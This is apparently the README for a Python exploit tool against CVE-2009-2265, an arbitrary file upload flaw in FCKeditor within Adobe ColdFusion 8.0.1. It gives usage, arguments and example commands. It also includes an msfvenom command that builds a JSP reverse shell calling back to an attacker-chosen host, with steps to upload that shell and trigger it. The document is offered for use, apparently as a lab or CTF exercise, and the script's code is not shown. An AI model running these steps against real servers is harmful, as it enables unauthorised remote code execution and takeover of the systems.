a python3 script to exploit CVE-2009-2265.
the script exploits a vulnerability found in FCKeditor < 2.6.4.1 which was implemented into adobe coldfusion 8.0.1:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2265
the script allows the user to submit a file to upload to a target computer
running coldfusion 8.0.1 and execute it.
- python3
- requests module for python3. can be installed with:
pip3 install requests
After identifying a target running adobe coldfusion 8.0.1, run with:
chmod +x cf8-upload.py
./cf8-upload.py -h
or
python3 cf8-upload.py -h
the -h or --help option shows how to run the script with a few examples. there are two positional arguments and a few optional arguments.
./cf8-upload.py --help
usage: cf8-upload.py [-h] [-a] [-n] [-r] address path
./cf8-upload.py exploits an LFI vulnerability in
adobe coldfusion 8.0.1
positional arguments:
address ip/hostname, port, sub-directories to the adobe
coldfusion 8.0.1 server
path path to file you wish to upload (eg.
'/path/to/file.txt')
optional arguments:
-h, --help show this help message and exit
-a, --accessible turns off features which may negatively affect
screen readers
-n, --no-colour removes colour output
-r, --request request webpage after successfully uploading
file
examples:
./cf8-upload.py 10.10.10.10 file.txt
./cf8-upload.py 10.10.10.10:8500 /path/to/reverse-shell.jsp -r
./cf8-upload.py hostname:8500/sub-dir /path/to/upload.zip -n
adobe coldfusion uses port 8500 by default but the full path to the server must be specified when executing the script.
a default installation of coldfusion may well reside in the root directory on port 8500 in which case x.x.x.x:8500 will most likely suffice for the address argument when executing the script.
cf8-upload.py by default, prints in colour and with some additional formatting to the terminal output, however this is not always helpful for those that use screenreaders. using the --accessible argument will disable fancy formatting and colour from being printed to the terminal. it will also disable ascii art.
this flag makes the script perform a get request to the file, and only after it has been successfully uploaded. this option is useful if the user is uploading a reverse shell of some kind to the vulnerable application and wishes to immediately trigger it. the content of the get request is not printed to the terminal and only serves to trigger the event on the server.
adobe coldfusion is able to read from .jsp files so a reverse shell can be created in msfvenom with something as simple as:
msfvenom -p java/jsp_shell_reverse_tcp lhost=[my ip] lport=[my listening port] -f raw > rshell.jsp
and uploaded:
./cf8-upload.py 10.10.10.10:8500 /path/to/rshell.jsp -r
the adobe coldfusion 8.0.1 application may not have the ability to overwrite existing files that get uploaded with the exploit script. in which case, uploading a different file with the same name as a previously uploaded file may result in timeouts during the uploading process.
you may need to rename the file you want to upload to something else before attempting to reupload.
the script was mainly an exercise in creating a short, comprehensive, self-contained program for a single exploit with both readability and accessibility in mind.
https://skerritt.blog/a11y/ - accessibility implementation.